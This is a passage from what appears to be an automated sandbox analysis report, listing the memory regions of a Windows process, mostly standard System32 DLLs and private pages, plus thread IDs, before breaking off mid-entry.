"\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1107 start_va = 0x723a0000 end_va = 0x7244ffff entry_point = 0x723a0000 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 1108 start_va = 0x724a0000 end_va = 0x724cdfff entry_point = 0x724a0000 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 1109 start_va = 0x724d0000 end_va = 0x724d9fff entry_point = 0x724d0000 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1110 start_va = 0x724e0000 end_va = 0x72504fff entry_point = 0x724e0000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1111 start_va = 0x72510000 end_va = 0x72557fff entry_point = 0x72510000 region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 1112 start_va = 0x72560000 end_va = 0x72565fff entry_point = 0x72560000 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 1113 start_va = 0x72570000 end_va = 0x72585fff entry_point = 0x72570000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1114 start_va = 0x72590000 end_va = 0x725dcfff entry_point = 0x72590000 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 1115 start_va = 0x727c0000 end_va = 0x727d6fff entry_point = 0x727c0000 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 1116 start_va = 0x727e0000 end_va = 0x7298dfff entry_point = 0x727e0000 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 1117 start_va = 0x72990000 end_va = 0x729bafff entry_point = 0x72990000 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 1118 start_va = 0x729c0000 end_va = 0x729dcfff entry_point = 0x729c0000 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 1119 start_va = 0x729e0000 end_va = 0x72c44fff entry_point = 0x729e0000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1120 start_va = 0x72c50000 end_va = 0x72cb3fff entry_point = 0x72c50000 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 1121 start_va = 0x72cc0000 end_va = 0x72d23fff entry_point = 0x72cc0000 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 1122 start_va = 0x72d30000 end_va = 0x72de6fff entry_point = 0x72d30000 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 1123 start_va = 0x72df0000 end_va = 0x72e83fff entry_point = 0x72df0000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 1124 start_va = 0x73050000 end_va = 0x7325dfff entry_point = 0x73050000 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 1125 start_va = 0x732c0000 end_va = 0x732cdfff entry_point = 0x732c0000 region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 1126 start_va = 0x732d0000 end_va = 0x73309fff entry_point = 0x732d0000 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 1127 start_va = 0x733a0000 end_va = 0x733a7fff entry_point = 0x733a0000 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 1128 start_va = 0x733b0000 end_va = 0x733bffff entry_point = 0x733b0000 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 1129 start_va = 0x733d0000 end_va = 0x733eafff entry_point = 0x733d0000 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 1130 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1131 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1132 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1133 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1134 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1135 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1136 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1137 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1138 start_va = 0x739e0000 end_va = 0x73a5cfff entry_point = 0x739e0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1139 start_va = 0x73b40000 end_va = 0x73b46fff entry_point = 0x73b40000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1140 start_va = 0x73b50000 end_va = 0x73b74fff entry_point = 0x73b50000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1141 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1142 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1143 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1144 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1145 start_va = 0x73c80000 end_va = 0x73c86fff entry_point = 0x73c80000 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 1146 start_va = 0x73c90000 end_va = 0x73ca3fff entry_point = 0x73c90000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 1147 start_va = 0x73cb0000 end_va = 0x73cb7fff entry_point = 0x73cb0000 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 1148 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1149 start_va = 0x73d80000 end_va = 0x73e7afff entry_point = 0x73d80000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1150 start_va = 0x73e80000 end_va = 0x73eaefff entry_point = 0x73e80000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1151 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1152 start_va = 0x73ed0000 end_va = 0x73f08fff entry_point = 0x73ed0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1153 start_va = 0x73f10000 end_va = 0x73f18fff entry_point = 0x73f10000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1154 start_va = 0x73f20000 end_va = 0x73f57fff entry_point = 0x73f20000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 1155 start_va = 0x73f60000 end_va = 0x73f8efff entry_point = 0x73f60000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 1156 start_va = 0x73f90000 end_va = 0x74041fff entry_point = 0x73f90000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 1157 start_va = 0x74050000 end_va = 0x741dffff entry_point = 0x74050000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1158 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1159 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1160 start_va = 0x74320000 end_va = 0x74331fff entry_point = 0x74320000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1161 start_va = 0x74340000 end_va = 0x7435dfff entry_point = 0x74340000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1162 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1163 start_va = 0x74500000 end_va = 0x745f7fff entry_point = 0x74500000 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 1164 start_va = 0x74600000 end_va = 0x747b6fff entry_point = 0x74600000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 1165 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1166 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1167 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1168 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1169 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1170 start_va = 0x75010000 end_va = 0x75051fff entry_point = 0x75010000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1171 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1172 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1173 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1174 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1175 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1176 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1177 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1178 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1179 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1180 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1181 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1182 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1183 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1184 start_va = 0x75650000 end_va = 0x7567cfff entry_point = 0x75650000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1185 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1186 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1187 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1188 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1189 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1190 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1191 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1192 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1193 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1194 start_va = 0x76650000 end_va = 0x76744fff entry_point = 0x76650000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1195 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1196 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1197 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1198 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1199 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1200 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1201 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1202 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1203 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1204 start_va = 0x76e70000 end_va = 0x76fa5fff entry_point = 0x76e70000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1205 start_va = 0x76fb0000 end_va = 0x771aafff entry_point = 0x76fb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1206 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1207 start_va = 0x77370000 end_va = 0x77372fff entry_point = 0x77370000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 1208 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1209 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1210 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1211 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1212 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1213 start_va = 0x7ff9a000 end_va = 0x7ff9afff entry_point = 0x0 region_type = private name = "private_0x000000007ff9a000" filename = "" Region: id = 1214 start_va = 0x7ff9b000 end_va = 0x7ff9bfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 1215 start_va = 0x7ff9c000 end_va = 0x7ff9cfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9c000" filename = "" Region: id = 1216 start_va = 0x7ff9f000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff9f000" filename = "" Region: id = 1217 start_va = 0x7ffa1000 end_va = 0x7ffa1fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 1218 start_va = 0x7ffa2000 end_va = 0x7ffa2fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 1219 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 1220 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 1221 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 1222 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1223 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1224 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1225 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1226 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1227 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1228 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1229 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1230 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1231 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1232 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1233 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1234 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1235 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1236 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1237 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1238 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1239 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1240 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1241 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1242 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1243 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 47 os_tid = 0x99c Thread: id = 48 os_tid = 0x904 Thread: id = 49 os_tid = 0x308 Thread: id = 50 os_tid = 0x7a0 Thread: id = 51 os_tid = 0x71c Thread: id = 52 os_tid = 0x734 Thread: id = 53 os_tid = 0x6f8 Thread: id = 54 os_tid = 0x6b8 Thread: id = 55 os_tid = 0x6b0 Thread: id = 56 os_tid = 0x6a8 Thread: id = 57 os_tid = 0x674 Thread: id = 58 os_tid = 0x418 Thread: id = 59 os_tid = 0x268 Thread: id = 60 os_tid = 0x150 Thread: id = 61 os_tid = 0x798 Thread: id = 62 os_tid = 0x72c Thread: id = 63 os_tid = 0x708 Thread: id = 64 os_tid = 0x704 Thread: id = 65 os_tid = 